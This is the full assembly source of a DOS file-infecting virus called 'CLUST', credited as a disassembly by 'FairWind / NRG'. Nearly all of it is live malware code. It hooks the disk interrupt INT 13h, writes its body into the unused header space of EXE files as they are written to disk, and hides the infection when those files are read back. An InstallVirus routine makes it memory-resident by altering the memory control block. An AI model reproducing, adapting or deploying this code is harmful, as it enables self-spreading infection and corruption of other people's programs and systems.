CLUST
;
--------------------------------------------------------------------------
; Disassembled by FairWind / NRG , [email protected]
;
--------------------------------------------------------------------------
.model tiny
.code
org 100h
start:
jmp short EntryPoint
LotsaNOPs db 122 dup (90h)
OldInt13 dd 0
EntryPoint:
db 0e9h,7ch,0
Int13Handler:
cmp ah,3
je IsDiskWrite
cmp ah,2
jne GoInt13
pushf
call cs:OldInt13
jc Exit13Handler
cmp word ptr es:[bx],7EEBh
jne Exit13Handler
mov word ptr es:[bx],5A4Dh
push di cx ax
mov cx,115h
xor ax,ax
db 89h,0dfh
add di,80h
rep stosb
pop ax cx di
Exit13Handler:
iret
GoInt13:
jmp cs:[OldInt13]
IsDiskWrite:
cmp word ptr es:[bx],5A4Dh
jne GoInt13
cmp word ptr es:[bx+4],75h
jae GoInt13
push ax cx si di ds
push es
pop ds
db 89h,0deh
add si,80h
mov cx,115h
AllZeros:
lodsb
cmp al,0
loopz AllZeros
cmp cx,0
jne ExitInfectHandler
db 89h,0dfh
add di,80h
mov cx,115h
mov si,offset OldInt13
push cs
pop ds
rep movsb
db 89h,0dfh
mov ax,7EEBh
stosw
ExitInfectHandler:
pop ds di si cx ax
jmp short GoInt13
InstallVirus:
mov ax,3513h
int 21h
mov word ptr cs:[OldInt13],bx
mov word ptr cs:[OldInt13+2],es
mov ah,0Dh
int 21h
mov ah,36h
mov dl,0
int 21h
mov ax,cs
dec ax
mov ds,ax
cmp byte ptr ds:0,'Z'
jne Terminate
;sub word ptr ds:[3],39h
db 81h,2eh,03,0,39h,0
;sub word ptr ds:[12h],39h
db 81h,2eh,12h,0,39h,0
mov si,offset OldInt13
db 89h,0f7h
mov es,ds:[12h] ;ES = new segment
push cs
pop ds
mov cx,115h
rep movsb
mov ax,2513h
push es
pop ds
mov dx,offset Int13Handler
int 21h
mov ah,4Ah
push cs
pop es
mov bx,39h
int 21h
push cs
pop ds
mov bx,ds:[2ch]
mov es,bx
xor ax,ax
mov di,1
ScanForFilename:
dec di
scasw
jnz ScanForFilename
lea si,[di+2]
push bx
pop ds
push cs
pop es
mov di,offset Filename
push di
xor bx,bx
CopyFilename:
mov cx,50h
inc bx
lodsb
cmp al,0
jne StoreFilename
mov al,0Dh
StoreFilename:
stosb
cmp al,0Dh
loopnz CopyFilename
mov byte ptr ds:[28fh],bl
push cs
pop ds
pop si
dec si
int 2Eh
Terminate:
mov ah,4Ch
int 21h
db 0
Filename db 1
end start
